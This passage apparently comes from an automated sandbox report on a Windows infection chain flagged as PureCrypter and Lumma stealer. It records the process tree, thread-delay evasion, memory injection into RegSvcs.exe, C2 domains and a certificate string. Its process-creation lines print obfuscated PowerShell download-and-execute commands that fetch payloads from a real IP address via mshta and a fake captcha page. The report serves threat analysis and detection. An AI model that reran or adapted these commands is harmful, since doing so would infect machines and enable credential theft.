WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2061	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1181	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4995	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 614	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5201	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 560	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3974	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1128	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 5245	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2020	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468	Thread sleep count: 5201 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 528	Thread sleep count: 560 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 34000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33748	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 33048	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32798	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32336	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 32013	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31345	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 31083	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30910	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30309	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30062	Jump to behavior

Source: powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWuw
Source: mshta.exe, 00000003.00000003.2085261392.000002062AA10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW :
Source: mshta.exe, 00000003.00000003.2106231402.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105547941.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074972565.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137551691.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3292084105.000001A4C5059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3288215612.000001A4BFA2B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3287680799.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3331435261.0000000005421000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWeP
Source: powershell.exe, 00000007.00000002.2407828166.0000022DFF670000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW!

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 13_2_004402D0 LdrInitializeThunk,

13_2_004402D0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_3276.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6528.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_1644.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7256, type: MEMORYSTR

Detected PureCrypter Trojan

Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: 92.255.57.112MIIE3jCCAsagAwIBAgIQAMyl7gKxD8R/bGWvMD10ZTANBgkqhkiG9w0BAQ0FADAQMQ4wDAYDVQQDDAVXaXB3dzAgFw0yNTAxMDMwMDU2NDNaGA85OTk5MTIzMTIzNTk1OVowEDEOMAwGA1UEAwwFV2lwd3cwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCJBHoD8dGnUp6uYikMPGLQueXv2m1Xu0heqNGi2rCJpNYbl6KI9IV6SjdkExryLeKPYYSlWJ7DpE1Q7MIziyKNfFegW9a8TG2e/iEzAEo/tpV7x9RPIcRQ/edfva5A7UXDwXtDOBoYut0QSFv09mPd+CTwBK2QBs0oGsqD/xOsjVYJJ4KX1Hd96OdFoMaocbr2/5Vd8byNHtQ+l5gorVyZF2uB8sq3Atk6wnNCp2LpnVn0fLwXr1M5IrgyIGBJlxgnApZhEK4fw9312ERy4LBTeYPi0l4CWlSHSZtthWyfNpn0jl+yg+C6nt4Ty6Ddbs9Ch014fZot/dxSYY4HaEpGNiLJ6+wDTmiTtxPBYp9q6+zAR9HhQdrby9L2vhbmIbbVrD3TR+5TcegrQ8itsRmEzDIS+F7fnCxwtWuYfDYXSl0bjIgMfCzROhBr2AAWjU8YQLZjaeJ1AdBHDnwNXYeT75YAbl8ZjtKlQVknG+OW3CwtOxSQZ+fxg4ksAiddtvvGH3e4sqkmwEhX4YOTN3F+ueUINzIPBqLNOhwezuUzyOVedqJhEspsMOG7tN+2HOjLyMUxyT46zfa4feCZap9mmcxW1nTePXW5pSlWxOa4+PG+BOr0Cc7bPmTwBSWNnKy1dDVQyCuazmo9qJ7F9JaEW3tYtqjJheI8dPTlNcCbIwIDAQABozIwMDAdBgNVHQ4EFgQU6wPCBOLkp1AKy1BgfeO7G7mU/9wwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAIOkGO4X8MYgfkdBrYh0KLj11P8ETDbp9EokYcLU3xGh3qtdYRakKdtz4V2GwCWauK0sbOzIWqm+0nuF1BFG4Ff/n90e8zQy4Dx1HkrG+A/4NRiq/1ZRcUhXcEOCbCQlhREZtin6BwTno5ypVaqtWI7ip+OZZruNvVLAQaR2wPKe9W8M+ACn8ipeXGmtow9rqpnUM0KCgT36+TkDyiz6RqBxWjiyDWoodnkxuqrffZdMrob7FxYxWlXK9ODtx/88FBHz0wabvGFkHlWNAUr3BTBMyOyZZTOn08RLKDw90Uj/e9vQf9AutujdJtyhuXL/qbBVOa0bWHIbEdai5rFwo17XMBQhcVDD7cKi4UxpxdviOT3t0ALlE8Zw/NDNz/a0u+bQL3rP7+KCy4X9FidO6umTIoWRv8OSotXX+TsJf+HtG9/nBxEnBF0URXzzCTb20vTtrqfr0zeuZIZN/B0zU68bFS0FycEJVD1y47yhsBThhEVvUMWIYu/RlEENmiT5KYoHD6mcNEXvOUXYFHSiNhNP3ocZAAEirBiZWk2i/mwwd1iL6baDKt+7btwWjUUvqDtnZThWLXjsKkvk84tfiEwVBzZiv3tHotXZB6Y+ILVrE9HdE2I0zyhWIrVRE+tNQxTwb49fLxIF+SoF4K3lYK5Gnp4JYord3Uhmhmm9mZGo="Default:BAPPDATAJ3e74489724f9

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat
Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curtainykeo.lat

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 404000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 406000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 106C008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9E0008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FA9008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x	Jump to behavior

Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTeeq
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTeeq8
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002F27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTeeq(
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTeeqH
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh{eqx

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
